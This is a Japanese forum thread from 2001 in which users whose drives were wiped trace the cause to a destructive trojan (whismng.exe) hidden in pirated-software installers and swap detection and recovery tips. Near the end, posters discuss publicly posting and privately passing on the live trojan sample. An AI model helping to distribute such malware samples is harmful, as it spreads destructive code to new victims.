HDぜんぶ消去した上ズタズタに！！ウィルス

やられた！！
nimdaどこでない！
昨日の晩、突然ＨＤが見る間に全て消去されていき、さらには共有先のマシン3台までやられた。
ファイナルディスクで、画像ファイル1枚だけ助かったけど、あとはデータが３３バイトごとにズタズタに...
原因は、メールか不正アクセスか定かでないが、いきなりメディアプレーヤーを更新するメッセージが出て、その直後のこと。
ＩＰＡに問い合わせでも、そんな報告はないとのとこ。
いったいナニ？！
ネタではないです。しんけん情報ください！

vote?

voteナニ？

ttp://www.trendmicro.co.jp/virusinfo/default3.asp?VName=TROJ_VOTE.A

そうかも...これの進化形かも。
対処は？

　　　　　　　　　　　　 ／∧　　　　　　　 ／∧
　　　　　　　　　　　／　/ λ　　　　　／　/ λ
　　　　　　　　　 ／　　/　 λ　　　／　　/　 λ
　　　　　　　　／　　　/　 /λ　／　　　/　　/λ
　　　　　　 ／　　　　/　/ //λ　　　　/　/ //λ
　　　　　／　　　　　　　　　　　￣￣￣　　　　　　＼
　　　　/　　　　　　　　　　　　　　　　　　　　　　　　 λ　　　／￣￣￣￣￣￣￣￣
　　　/　　　　　　　　　　　　　　　　　　　　　　　　　　/λ　＜ 知るか、ヴォケ！
　　/　　　　　　　　　　　　　　∧　　　　　∧　　 　　 　/λ　 ＼＿＿＿＿＿＿＿＿
　　|　　　　　　　　　　● 　　λ ｀ ー―　´/　　●　　/ /|
　｜　　　　　　　　　　　　　　 λV V V V/　　　　 　 / //|
　｜　　　　　　　　　　　　　　　λ|　　　|/　　　　　 / / //|
　｜　　　　　　　　　　　　　　　　λAA/ 　　　　　 / /////
　　|　　　　　　　　　　　　　　　　　λ/　　　　　/ / ////|
　　＼　　　　　　　　　　　　　　　　　　　　////// /////
　　　＼　　　　　　　　　　　　　　　////// ///////／
　　　　　―　　　　　　　　　// // /////////////
　　　　　　　ヽ　　　　　　　　///////////////
　　　　　　　　　＼　　　　　　　//////////／
　　　　　　　　　　＼　　　　　////////／
　　　　　　　　　　　＼　　　　　/////／
　　　　　　　　　　　　　＼　　　　　／
　　　　　　　　　　　　　 　（　　　　）
　　　　　　　　　　　　　 　｜ ｜　|
　　　　　　　　　　　　　 　（_＿）＿）

VB製か・・・・・・・・・・・・・・・・・・・・

バラバラになったデータは復旧サービスで直るのかなぁ

　　　　　うわ〜ん、感染から１０日たったよ〜
￣￣￣￣￣￣￣￣￣∨￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　　　 　 Λ＿Λ
　　　　　　　　　　（ ゜∀⊂ヽ ﾆﾔﾘ
　　　　　　　　　 ⊂　　　　ノ
　　　　　　　　　　 人　 Ｙ
　　　　　　　　　　し （＿）
http://www.zdnet.co.jp/news/0109/28/e_nimda.html

こんなのも有るぞ。
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.vote.b%40mm.html
VOTEの亜種VOTE.B。添付ファイル自体はexeだが、.vbs3個生む。
詳細は見て見れ。

それより、>>1はパッチ当てて有るのか？NIMDA対策の。

一応最新か？TROJ_VOTE.Aスレッド
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001500947

Symantecは9/18に定義ファイルを出しているようだ。
おそらくトレンドも同じくらいの時期に対応してると思われ。
パッチ当てたり、定義ファイルの更新等、気をつけてれば防げたはず。

ここに出入りするような人間が、なぜそんなことを怠るかよくわからん。

http://www.symantec.com/avcenter/venc/data/[email protected]
今度はVOTE.Cだって。。。詳細わかったら書くって。。。

凄いなZaCkErって奴。かなーり厨房。
そんなに有名に成りたいかね。。。

>>12
自業自得なのはわかってるのだけど、古い5.00を使っていたので、へいきと油断してた...
今復旧サービスに問い合わせ中だけど、１００万くらいかかるそうな...
しかもデータが、こまかく断片化されているので、かなり困難らしい。

>>10
ありがと。
さっそくみてみる

>>10
今ＤＯＳで立ち上げてみてみたら、ネットに直接つながっていたマシンは全ディスク０バイトだった。
vbs3もなんもなし。カラポ
ＩＰＡにもそんな報告はないって

>>16
なんなんだ。。。ソレは。唖然。
証拠、、、残って無いって事か。。。
33バイトごとゴミ書き込むって。。。なんかのウイルスみたいでは有るな。。
http://vbc.trendmicro.co.jp/vbc/vinfo/vdb/vbcdefault3.asp?VName=PE%5FMAGISTR%2EB
#↑MAGISTRっぽいな。。。。何気に。。
１）ファイル感染活動：
　ウイルスはすべてのローカルドライブ、ネットワークドライブ、共有フォルダから "WinNT",
"Windows", "Win95", "Win98","WinME","Win2000","Win2K","WinXP" 　という名前のディ
レクトリを検索します。そして検索されたディレクトリ内にあるすべての拡張子.EXEもしくは
SCRでPE形式の実行可能ファイルに自身のウイルスコードを追加して感染します。ただし、以下
の条件のファイルには感染しません：
　・ファイル名の最初２文字が同じ文字のファイル：例"AABCD.exe"
　・ファイル名に"GRPC"という文字列を含んだファイル例"grpconv.exe"
　・ファイルサイズが 16,777,216Bytesを超えるファイル

改変されたNTLDR"と"WIN.COM"は実行されると"プライマリのハードディスクを上書してデータを
破壊してしまいます。"NTLDR"はWindowsNT/2000の、"WIN.COM"はWindows9x/Meのシステムファ
イルであり、Windows起動時には必ず実行されます。つまり、次回Windows再起動時にハードディ
スク内のデータがすべては破壊されることになります。
#・・・nimda騒ぎで影薄かったけど、コレはかなり危険。

>>17
危険度としてはnimdaより上だと思う。
voteでもないような気がする。
しかも証拠が残ってないので不正アクセスかメールなのかも特定できない。
再起動はしてないけど、ログオンは症状が出る直前にし直したので、きっかけはログオンも考えられるかも。

破壊ルーチン組んだ奴は必然的に感染広げられないから、認知度は低く成るけど
他にも多種多様。単純なバッチウイルスからある。
・・・何とか重要データだけでも復帰できること祈る。。。>1=18？

しっかし、IPA、報告無しって。。。調べて見るって言えないのかね。
・・アソコ、情報遅いし糞の役にも立たん。。。

>>17
1=18？そうです。
先週の日曜にフレッにしたばっかりなのですが、もっと慎重になるべきでした。
復旧の情報に関しては問い合わせ中ですが、どこもたっかいのですね。
とても個人ではまかなえない。
ＩＰＡも唯一の公的機関だって聞いてたのに、なんか反応わるいし。
せめて原因を特定してほしい。

社内で酔狂な奴がいて、どうでもいいPCをオフラインにしてわざとvoteの症状発生させたとの一報がありました。
今、詳しく聞いているけど、比較すると1さんのケースがvoteかどうか判断の参考になるかもしれませんので、わかり次第、ここに書きます。

こんなに深刻なケースもあるのに、「システム部門は29日のニムダ再発症に備えよ！！」と騒ぎを楽しむ若手や重役の厨房が会社で幅をきかせている。
「マスコミで話題騒然のワーム」で危機管理ごっこして遊んでる暇があったら、地味でも深刻な破壊活動するやつに備えたいんだよ、現場としては。
どこの会社もそうなのかな？

>>13
>凄いなZaCkErって奴。かなーり厨房。
>そんなに有名に成りたいかね。。。

ZaCkErって誰ですか。ID表示されてないんですけど。

こんなのもあるらしい
http://headlines.yahoo.co.jp/hl?a=20010929-00000002-vgb-sci

>>21
ありがとうございます。
詳細お待ちしています。
症状としては、見る間にディスクトップのアイコンが消えていき、すべてからっぽに。
メッセージは、なにもなし。
FAINALDATAでデータ復旧したところ、ファイル名は見えるものの、データがすべて３３バイトに断片化されていました。
イメージとしては、データを全て消去した後、シュレッターにかけてズタズタにする感じです。
もっとも重要なデータが５ギガあるのですが、復旧サービスにたのんだ場合最低でも８５万程度かかるらしいので、なんとか自力で復旧しようと思っています。
FAINALDATAエンタープライズをためしてみたいのですが、９万５千円って、けっして安くないので、思案中です。

トレンドマイクロのファイル復旧ソフト試した？

やられました。
深夜にリブートかかったまま、何らかのループ状態でBIOS暴走?して
マザーが逝きました。
LAN上の共有のPCのほうは、ノートンの更新ファイルがデリられてるし
あと気が付いた点は、ネットワーク設定が壊れている事
NetBEUIが消えていました。
共有していなかったPCは無傷。
感染源は不明。

1枚だけ助かった画像ファイルって気になるな

感染源を早く教えてくれよ。
不安じゃないか。

ログオンと同時にWindowsシステムフォルダを消すなんておかしくないか？
システムファイルにはOSレベルでロックがかかってるはずだろう。

>>21
voteが落す実行体って、vbsでしょ。
つまり、WTC.exe実行して、ドロップされた
MixDaLaL.vbs/DaLaL.VBS/WaiL.VBSをばtxtに拡張子変えて
VB詳しい奴にソース見せれば、何しようとしてるかはおおよ
そ解るんでない？破壊活動については。結局スクリプトな訳
だし、そのまま見れる筈。暗号、ポリモーフィック噛まして
なければ。んで、再起動する前に手動で書き換えられた値直
しとくと。
スコーシ安全な方法。

>>29
では問題です。
ＯＳレベルでロックがかかっているファイルをＯＳレベルで
削除したらどうなるでしょう？(藁

>>30
でも他人のVBソースなんて読みたくない（ｗ

>>32
特に、厨房の書いたソースなんて？？（ｗ

http://headlines.yahoo.co.jp/hl?a=20010929-00000002-vgb-sci

ずいぶん前に他のスレでこの話題が出てるぞ。

http://ton.2ch.net/test/read.cgi/sec/997350129/601-700

ここの638以降。
つーか俺もやられたんだけど。

FINALDATAエンタープライズは、体験版があるから
それを試してみるといいよ。

それと、感染源として濃厚なのは、
割れ物ソフトのインストーラー（or 実行ファイル）。
前のスレではそれが原因の人が何人か居た。

>>24
>イメージとしては、データを全て消去した後、
>シュレッターにかけてズタズタにする感じです。

というよりは、
ファイルサイズを３３バイトに変更した後、消した、
って事でしょ。

>>36
たださ、>1が、共有先までやられてるって言ってる事は、純粋にローカルドライブだけ
消す訳じゃ無いって事でしょ。。
LAN通じて共有ドライブまで消すフォーマッタ、有ればそれかも。

何気にメディアプレーヤー立ったのがスゴーク気になる>1
NIMDAのreadme.eml改変して同じ原理で？？.exe実行させる形にするのは可能。
やり方解れば中学生でも可能と思われ。あとは何を組み込んで実行させるか。

>>35
ものすごく有益な情報です！
ありがとうございます！
今スタンドアローンなＰＣを用意したので、原因を探ってみます。
サーバにメールが残ってるので。
何かわかったら、また書きこみます。

>>39
そうそう、それと、ファイナルデータのEメール版を買って使ってみたら、
ある程度はメールが復活できたよ。
確か体験版もあったので、試してみるといいかと。

そちらの情報も教えてください。
何か、怪しいクラックソフトなどをセットアップしたり、実行した覚えはありますか？
俺もまだ感染源を特定できてないので、どんな情報でも欲しい。

あと、名無しさんじゃわかりにくいから名前を「１」とかにしたほうがいいのでは？

セキュ板かソフトウェア板にノートンゴーストを入れたいなんかのスレにこのこと
についての言及があった。かなり詳しく書いてある。前にここでもこのことで騒ぎ
があった。二ヶ月も前の話だが。
この件でどうもおかしいのはMX。これをしている人に限って、何もしていないのに
消えるだの、制御できんあという事態が頻発した。
しかし、なぜかみんな少しの間騒ぐと、話題が消えてしまう。このことが何件かこの掲示板
であったので、なにかあるのではなんて思っている。
ちなみに、人によっては、IMをいれた人が訳のわからんIMを送り返され、再起動をかけたら、
すべて、このやり方で消されていた。ということもあったらしい。別にへんなファイルを起動
しなくても、ただ、つないでいるだけで、ＭＸをしたら、消されていたことあったそうな。
ちなみにこれにはfinaldataはエンタープライズ版でも効果はない。上書きされたような感じで、
本職のサルベージですら、まず復旧は不可能だと聞いている。また基本性能は実はやすいものも
高いものも関係なく、ディレクトリのファイルを直接出せるかどうかしかない。
過去に何度かこれはでたが、この関連はほとんど過去ﾛｸﾞにしかない。
参考になりましたか。
あと、ほとんど話題にはでてこないが、これは、過去にはMX関連でしか話が出てこないため、
表にでにくいようなのだ。

そいやこんなのもあったね。
http://www.wg7.com/wg09fbdocs/setsumei.html

その画像ならココ
http://www.f2.dion.ne.jp/~impact14/

>>41
>ちなみにこれにはfinaldataはエンタープライズ版でも効果はない。

>>35のスレでは、ある程度復旧できた人が居たよ。
あと、ファイナルデータのEメール版で俺はメールを少し復旧できた。

ゾヌ入れておけば、ＭＸのバックドアから入られないので
大丈夫ですか？

ｾｷｭ物のわれずはやめよう

FATであればエンタープライズ版で復旧できる可能性が高いのではないだろうか？
NTFSは、情報なし。

1です。
いろいろ情報ありがとうございました。
とても参考になりました。
MX、実は思いっきり心当たりあります。
コトの起こる１日前に、MXを入れたばかりでした。
さすがに、入れてすぐは共有をきっておいたのですが、半日なにも問題なかったのでLANをつなげました。
わたしの場合、MXがらみが原因なのは間違いないでしょう。
ちなみに、サーバに残してあったメールはなにも問題なし。
不正アクセスも、まめにフレッツを切っていたのでないと思います。
FAINALDATAエンタープライズ版は、購入するつもりです。
アルファオメガに問い合わせたところ、FATでいけるならNTFSでも可能性は高いとのこと。
PSDや、JPGなどのメジャーなデータは登録してあるので、かなりの確率で復旧できるらしいのですが、わたしのデータは３DのOBJECTデータなので望み薄でしょう。
だめもとでトライしてみます。
ファイルのヘッダー情報などはわかっているので、自分でデータベースに登録することができれば復旧できる確率はたかいのですが...
いろいろ自分でためしてみるつもりなので、また情報があれば書き込みます。

>>48
MXを共有していただけで、今回の現象が起きましたか？
1日でどんなものを落として（拡張子など）、
どんな作業をしましたでしょうか？（EXE実行？MPEG再生？）
再生した場合は、どんなツールで再生しましたか？
その辺を出来るだけ詳しく教えてください。

前にも書きましたが、ファイナルデータエンタープライズを買う前に
試用版でテストをしてみたほうが良いですよ。
アルファオメガのページにエンタープライズの試用版があります。
私は、それでFATもNTFSも試しましたが、ダメでした。

３Dですか・・・Lightwaveのクラックとか落としてインストールしたりは
していませんか？

仮に、クラックソフトを落としてインストールしていたとしても、
みんなあなたを責めたりしませんので、正直に教えてください。
今は皆、この現象の発生条件を知りたいのです。

エンタープライズ版どこにもないよー
土曜にはたくさんあったのに。

エンタープライズ版でいける場合といけない場合があるということは、
MXがらみの削除するウィルスが複数存在するということか？

恐ろしいのう。

ってか、クライアント同士のp2pファイルシェアリングって、今時海外の一番や
ばそうなxx街で立ちんぼ引っ掛けてゴム無しで遣りまくるみたいなもんでしょ。
漏れは、binエディタで開いて不信な部分見分けるスキルなんて無いから手は出
せないけど。
ツワモノはニオイで解るらしいけど、、、香水バリバリなら解らんぞキット。

>>54
悪気が無くても自然に感染するものでもあるまい。
ずいぶんわけは違うのでは。

>>55
原理考えると怖いのよぅ。。。
漏れ、鼻利かないし。。。
見てくれに騙されてスグ手出すし。
MX自体、バグ報告って盛んにされてるの？
というか、ブートウイルス絡むとどうしようも無いんじゃ？。。。

>>49
AdobeStreamｌineです。
症状がでたのは、インストール直後でなく翌日でした。
再起動はしてないから、たぶんきっかけはログオン。
それとどういうわけか、本当にエンタープライズがどこも売り切れです。
先週まではどこにでもあったなのに。
いま評価版でスキャン中ですが、何時間もかかりそうです。

>>57
やはりソフトをインストールしてたんですね。
間違いなく原因はそれですね。

今回の症状は、あるソフトをインストールした後の
再起動（もしくはログオン）後に発動する、というものです。
おそらくウイルスではなくて、
スタートアップに登録される１個のアプリケーションなんでしょうね。

もう１つ質問ですが、インストーラーで入れましたか？
それとも、単にアプリケーションを実行しましたか？


>いま評価版でスキャン中ですが、何時間もかかりそうです。

私は２００ＧＢくらいあったので、４０時間くらいかかりました・・・

まさに>>35さんの言っていたスレの通り
僕はそのスレの660です
僕の場合は"Dimensions 3 J"です
このソフトは、落とした圧縮ファイル＆解凍したファイルをスキャンしても、ウィルスソフトに引っかかりません
何度か実験した結果、スタートアップにフォーマットプログラムが組み込まれていたようです
このタイプは、アンチウィルスソフトでは対策不能に近いです
インストール後に「START and STOP」　などのスタートアップ監視ソフトで監視することですね

ちなみにまだ大事に持ってますよ(w
大事な実験道具ですから

割れ物を扱う以上、このぐらいは覚悟の上でやるように
俺も割れ物に手を出してるが、やはりインストールするときは緊張する
今まで3回もやられて、FDISKからやり直してる
ちなみにウィルスソフトはすべてすり抜けられてしまった
割れ物ってのはそういうモノなんだよ

あ、なんか紛らわしい書き方になっちゃいました
僕は>>1さんではありません
ただあまりにも同じ境遇だったもので

>>61
>割れ物ってのはそういうモノなんだよ

ここでそんな偉そうな説教を聞きたい人なんて一人もいません。
有益な情報を書き込むのならばともかく、無駄な書き込みはやめましょうね。

>>59
インストール後、レジストリのスタートアッププログラムを見ても
何も姿は見えないのでしょうか？

ＯＳは９８でも２０００でも同じですか？

>>63
別に偉そうに説教してるつもりはないが
おもいっきり自分を卑下してるけど

>>64
2000のみで確認
今ちょっと実験用のPCが使えないので、98の確認はいつになるかわかりません
レジストリを直接見てないですけど、監視ソフトで確認できました

今、自分のレスを読み直してみたが、
確かにかなりウザイな
悪かった、
原因が原因だけに、ちょっと熱くなってしまったようだ
ごめんな
>>1

>>66
>監視ソフトで確認できました

そうなんですか。
ではインストールされているディレクトリなどもわかるのですか？
もし毎回同じ場所だったら対策出来そうですね。

とても役立つ情報ありがとうございます。

WinMX自体が問題なのかもって可能性は？
>>1はWinMXをどこから入手したの？本家サイト？？

■ 初心者用質問スレッド Part III ■
>>69
こっちきて！

友達の話だが、このあいだそいつもＨＤの中身が消えうせたらしい。
やはり、ＭＸでおとしてきた割れを入れた結果だそうだ。
そいつはパーティションくぎってたため、
幸い消えたほうは重要なほうではなかったらしく、
最悪の事態はさけられたといってた。
これもたぶん同じ原因だよね。

>>68
昨夜は夜遅くなって寝てしまい、レスが遅れてしまいました
で、ご質問の件なんですが、
僕が何回かインストールしたとき、
その症状をメモってたのでここに書いてみますね

ソフト:Adobe dimensions 3.0J シリアル無しをインストール後
先ほどの「START STOP」っていうソフトで見たときにこういう表示が出る

Whistler 　| Machine Registry | C:\WINNT\System32\whismng.exe -next

ソフトでこのプログラムを無効にしたら、再起動しても問題なし
次に、直接このプログラムを実行したらHDがガリガリいいながらファイルが消えていきました
ちなみに、LANでつないでるPCには影響ありませんでした

どうでしょう？参考になるかな？

>>72
おぉ！すごい！
プログラム名までわかるとは凄い情報ですよ。

で、whismng　で検索して調べてみました。

以下のようなものらしいです。

--------
The program or trojan is called "Microsoft Windows XP & Office XP Unused Serial Number Generator"

Chuck just opened it and then looked into exe file. Then I
saw the sentence "You did a piracy, you deserve it."
He claims it will delete all your files after your computer is rebooted.

If someone already executed this program, do not reboot the computer. Open regedit and go to:
--------
エキサイト翻訳
プログラムかtrojanは「マイクロソフト・ウインドウズXP&オフィスのXPの未使用
のシリアル番号ジェネレーター」と呼ばれます。チャックはそれをちょうど開き、
次に、exeファイルを調査しました。その後、私は文を見ました「著作権侵害を
行いました、それに相当する。」彼は、あなたのコンピューターがリブートされた
後それがあなたのファイルをすべて削除するだろうと主張します。
誰かが既にこのプログラムを実行した場合は、コンピューターをリブート
しないでください。regeditを開いて、次のものに行ってください:
HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun。そこから、
whismng.exeへの言及を削除してください。
--------

もう少し調べてみます。

>>23
に書いてある、これに間違い無さそうですね。

http://headlines.yahoo.co.jp/hl?a=20010929-00000002-vgb-sci

でも、うちはこんなメッセージは出なかったな・・・
亜種か？

You did a piracy, you deserve it.

http://www.symantec.com/region/jp/sarcj/data/w/w32.whiter.trojan.html

シマンテックにも情報あり。

72さんのおかげで一気にここまでわかりました。

ところで、ウィルスソフトをスルーしたというのは、
９月２４日以前だったからでしょうか？

なんにしても、かなり最近発見されたものなんですね。

>>76
落としてきた圧縮ファイルや、解凍して出てくるファイルをスキャンしても、ウィルスを検知しません
今試してみたら、9/27のNortonの定義でも同様でした

プログラムのセットアップ完了後に、システムにウィルスが組み込まれるので、インストール後なら検知できるでしょうね
ただ、インストール後、再起動やログオフしてしまうと、次回起動時にHDが逝っちゃいますので
インストール後、再起動前にスキャンする必要があるでしょうね
もしくは、何らかのスタートアップ監視プログラムを常駐させておくかでしょうね

僕が思いつく対策といえばこれぐらいしかありません
ついうっかりスキャンし忘れて再起動してしまったとき、取り返しがつかなくなるので
僕は監視ソフトを使ってますが

http://www5.justnet.ne.jp/~ttp/

>>78
有料エロサイトへのリンク

結局、割れもんにソース弄って組み込んで有るって事ぢゃねーのか？？

>>80
正確には、割れ物のインストーラーね。
割れ物本体に入っているわけじゃない。

もう一つ見分け方があるのを忘れてました
解凍して出てきたファイルの日付を見る方法です

Setup.exeの日付だけが異様に離れている場合、Setup.exeだけ後から手を加えられたモノだとわかります
さっきから何度も出てきてる(w Dimensions 3.0J を見てみると
他のファイルは1996年とか1997年なんですが、Setup.exeだけは2001/8/23となっています

こういうセットアッププログラムを見かけたら警戒した方がいいかもしれません

>>81
んま、インストーラだろね。
該当割れソフト関連のレジストリにソフト起動と同時に起爆させる値書き込んだり。
割れ物手出す人は正規品の設定する正常なレジストリ値なんて知らないし。
タイマー入れて何度か使って安心してから起爆も有りだろうし。

前に割れ物ROMグラフィクソフトに手出して痛い目見た漏れ。。。ウイルスチェクは
ROM自体に当然掛けたさ。
せめて、手出す前にインストーラぐらいはダンプ取って不信な兆候見つけなきゃ。
ってか、そんなスキル漏れには無いけど。

>>83
>ソフト起動と同時に起爆させる値書き込んだり。

いや今回の場合は、スタートアップね。
いままでに出てるリンクをよく読んでみ。

単純明快に、インストーラーによってフォーマットプログラムが
インストールされて、それがスタートアップに登録されるだけ。
まったくもってシンプル。

>>84
シンプルだけど、なかなか効果的

>>85
「なかなか」、どころじゃなくって効果は「最高」でしょう。

ところで、

”割れ物ROMグラフィクソフト”

って何だ？
割れ物グラフィックスソフト、ならわかるけど、
なぜ間にROMが入る？エミュレーター？

Shiftキーで解除できるから「最強」じゃない。

あ、CD-ROMの事か？

>>88
まぁ最高かどうかなんてどうだっていいよ。

>>89
そゆ事です。
フォーマットまでは行かなかったけど。。何か常駐してリソース食ってる気配
ぷんぷん。入れてからハングの嵐出まくり。グラフィクソフト動かさなくても。
多分フォト署プか苛ストレタが怪しかった。。結局原因不明。んな知識その頃
無かったし。
スタートアプとしてHKEY〜〜〜CurrentVersion\Runの値は、いかにもで嫌い。
つまり、起動時実行要求する奴で無い場合はココの書き込み確認すれば良いで
しょ。グラフィクソフト、起動時スタートは先ず無いし。
再起動前に必ず確認。
それでも、該当ソフトの動作に関連付けられてればアウト。
それと、セキュリティ関係の場合は当然起動時スタートさせなきゃだから一番
危険と思われ。レジストリ以外にも.iniとか色々だし。。

原因もほぼ特定でき、対策法も出そろった様子
けっこう綺麗にまとまりましたね
もっと混沌としたスレになるかと思いましたが。。。

ひとつ疑問が残るのは、FINALDATAエンタープライズで復旧できるケースと、
できないケースがあるのはどうして？

72さんのおかげで、話が具体的にまとまりました。
前スレからいる私としては原因がわかってうれしい限りです。

>>93
普通は、エンタープライズでも修復できないように思います。
ただエンタープライズには、ファイルサイズを変更する機能があるので、
それを使えばもしかして可能かもしれません。
といっても、１ファイルごとに手動でファイルサイズを入れていかないと
ダメなので、私はやめました。
元々のファイルサイズだって覚えてないし・・・

友達の話で恐縮ですが、彼もデータをやられたみたいです。
データだけ消えててフォルダは残ってたらしいのですが（ウィンドウズは起動したみたい）
これもここに書かれていると同じ症状なのですかね？ちなみにMXで割れをやってたそうです。

>>95
同じです。フォルダだけ残るのがこのウィルスの特徴です。

ウィルスバスターのデータベースには、まだ載ってないようです。
ノートンのほうが早い。

>>93
スコーシ、バグ有るんでない？
・・・いや、フォーマット掛けちゃう不正プログラムの方に。
後は、元の環境での断片化の程度とか？

横道それるけどwinのcryptAPI使ったウイルス存在してるのよ。
破壊というより全ファイルの暗号化なんだけど、ランダムにキー
生成してやるらしいの。
作者、バイナリ公開してるし。。。。メール添付のワームだけど。
復旧するにはフォーマットよりタチ悪いと思われ。

>>35を読まずに書き込んでしまった。ｽﾏｿ
とりあえずこの現象が起こった人はみなMXでDimensions 3 JをDLして
インストールしたのが原因と考えていいのでしょうか？

>>99
どうせならもう少し読もう。このスレも含めて。

いろんな割れ物に入っているようだよ。
前スレでは、MXで落とした「午後のこ〜だ〜」にも入ってたらしい。

>>100
レスありがとう。友達に報告しなければと思い焦ってしまいました。

>>98
ちなみに、今回のはフォーマットじゃないよ。
「ファイルを０バイトに上書きした後、削除」を
全てのファイルに繰り返す。
だから、全ファイルを消すまでに比較的時間がかかる。

フォルダはそのまんま残して、ファイルだけを消す。

以前モロやられた。ノートン入れてたが何の反応もなし
再起動したとたんＨＤがカリカリ言いながらひたすら
ファイル消して逝った・・・・。
未だ何のソフトか原因不明。

とりあえずファイナルデータ実行してみたが復旧出来たとしても
中身がかなりいじられていて使い物にならん
読取専用データはダメージ弱くてある程度は復旧出来たが・・・


コイツはかなり手強いゾ！
拾いモノはくれぐれも自己責任で・・・

Adobe dimensions 3.0J
Adobe Streamｌine

これ以外で報告ないの？

だからすぐ上に午後のこーだーって書いてあるじゃん。
ちゃんと読んでる？
あと、上のほうで紹介されてるスレも全部読んでみ。

ウィルス本体と、セットアッププログラムをまだ持ってるのですが
これってWeb上に公開＆配布したら犯罪になるんでしょうか？
プログラムとか全然わからないので、僕が持ってても意味無いのですが
詳しい人が見ると、何かわかるのかなと思いまして

>>106
ほ、欲しい。。

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

mQCNAzuwyfwAAAEEAKkeECqWhSWNqqoq1F7yK1ZDxHZbqw7n6ElISVYXTNym3cfP
sZrWsZdpIUHftlGUzCVeiegzcDrexSyqwh8jggFyc7YbYa6//fX8FhNwI14+moTe
0tVi4K7rzW9lfgHGsckSpjqWKTOV/Jf/mGWpMtnErkh2lAA3j/DcqHrvSEgvAAUR
tAt0ZXN0IDx0ZXN0PokAlQMFEDuwyfzw3Kh670hILwEB71IEAIZo2oOpNuYX80V8
9PnzGJVQS71DstPPfDEhmZX4P0qNVTUcQ5WUE7u4D4bbRV2VfXMQVaAoBzqDMquF
FP/oYzMpjYVI+i5wS4jxcndQVnvN1V4j0TaUYZHuBTz/fXYkStsHMbUpab3winPv
yeH32mu5mfZQeXBt7Vjmi2X97D3c
=hwlh
-----END PGP PUBLIC KEY BLOCK-----

も、漏れの公開キー。。。
コレでPGP掛けてどっか公開してケレ。

　　　　　　 ∧ ∧　 ／￣￣￣￣￣￣￣￣￣￣￣￣￣
〜′￣￣( ﾟДﾟ)＜　　逝ってよし！！！
　UU￣￣ U U　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿

>>108
なんで？
意味わかってる？

>>107
すんません、僕スキルがないので、それの意味がわかりません…
でも、公開しても警察のお世話にならないのなら、どこかに公開してアドレス貼ります

>>110
無理しなくてok。
貴方もPGP使ってなければ意味無いし、この為だけに入れるの大変。。

公開というより、上のキーで暗号化した奴、戻してファイルの中身みれるの
基本的に漏れだけ（ｗ
・・本来こういう目的にこそ使われてたと思われ＞PGP

普通に公開したら警察のお世話になるよ。気をつけてね。

うーん、なんとかして107さんに渡せるといいですね。
そうすれば、どんな仕組みのプログラムかわかるし、
もしかして復旧のヒントもわかるかもしれない。

>>113
ﾜﾗﾀｗ

>>114
ハァ？？

先月はじめ、こいつにやられた。外出だけど報告しとくね。
・MXやってた
・Acrobat5J入れた直後、ガリガリ言い始めた（再起動前）
・再起動したら全部消えた
・FINALDATA買ってきたら全部33KB
Acrobatかどうかは知らんが、あきらめた。IEEEの外付HDも消えた。

>>104、>>105
他スレから来ました。一応こっちでも報告。ファイルサイズ28MくらいのLightWave7
にも、これ入ってる奴があります。症状まったく同じ。フォルダだけ残ってファイルは
復活させるとみんな33バイト。

>>117
俺もそれでやられた。シーグラフで配ってた体験版をクラックしたやつね。

>>117
他に、この話題があるスレがあるんですか？
どのスレか教えていただけると助かります。

>>116
Acroのサイズ教えて

他の板から来ました。一応そこに書いたやつ↓
知らなかった。やっぱ他にもいたんですね。

> Virtual PC。
> 生まれて初めて被害にあった。
> ウィルスチェックにもひっかからなかったやつだが。
> ハードディスクがガリガリいう異変に気づいて
> 1GBほどの損失ですんだ。
> 危うく、ドライブ全部逝かれるとこでした。

Virtual PCのインストールファイルのあるドライブ(Eドライブ)と
マイドキュメント(Cドライブ)やられました。
既出のようにFinaldataも試したけどダメ。
C:\WINNT\System32\whismng.exe
がレジストリのRunにありました。
あとCドライブとインストールファイルのあるドライブに
テキストファイルでpiracyだろって。
Virtual PCのシリアルミスったのでトラップかと思ったが、
そういうことだったのね。

結局インストール時には専用のPCでしかやらないのが1番なのかな

中古のUSBのHDDにOSだけ入れて起動チェックをすると。
でもBIOSレベルで弄られたら駄目か　う〜ん

>>119

http://choco.2ch.net/test/read.cgi/download/1000483999/

ダウンロード板ね。

>>122

あっちにも書いたけど、VirtualPC使うと便利よ。もちろんトロイの
入ってない奴ね（笑・・・えねーよ・・・）。

これマジでやばいよヽ(；´Д｀)ノ

要は、インストールした後にすぐ再起動せずに、
C:\WINNT\System32\whismng.exe
を削除すればいいだけの話じゃん。

皆の情報のおかげで対策がはっきりしているので、
今はそんなに怖くない。

>>125マジッすか？ヽ(；´Д｀)ノ

>>126
俺は一度やられてるし。
直後は、原因が不明でかなり怖かったけど（再発症の可能性もわからんし）
このスレでいろいろ情報交換をしていたら原因がつかめたので今は怖くない。

ちなみに俺は、ローカルのドライブ２２０GBと、
ネットワークドライブ１２０GBを消されたのでかなり鬱だった・・・

>>128
よく立ち直れたな

>>128
それはきわめてきついな･･･

割れやってなけりゃ大丈夫？

>>125
ファイル名は変えられちゃうかもよ・・・

>>131
まずは大丈夫でしょう。メーカー製のインストーラーに混入してたら
大問題だ。ウィルスじゃないからね。

起動時にプログラム走らせるのが目的なわけでしょ。
だから、スタートアップさせるレジストリ値、system.iniなんかの値、
最低限で良いからマメに確認しとく。ソフトインストールするたびに。
んで、覚えの無い値できてたら、再起動する前にどのアプリに対する
値なのか、不審なフアイルに対する値なら、納得できるまで色々調べる。
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
今時典型的過ぎるけど、↑この辺の値ぐらいは常に押さえとく。。

HDが不正読み込みをする時は要注意と聞いたことがある。
たいてい、何か入れられて今回のような事態が起こることもあり得ると。

ＭＸやってるやつ。エロげーもこれが入っていた。「君がいる永遠」という
ゲームを交換したら、セットアップが自動でならず、おまけに起動し直したら
見事にそのものも消して、４０Ｇが３３バイトのファイルの流れになり見事になくなった。
ＭＸでエロゲにトロイかましているやつのことは聞いたことがあるが、まさか
こんなに大きいものにまであったなんて。
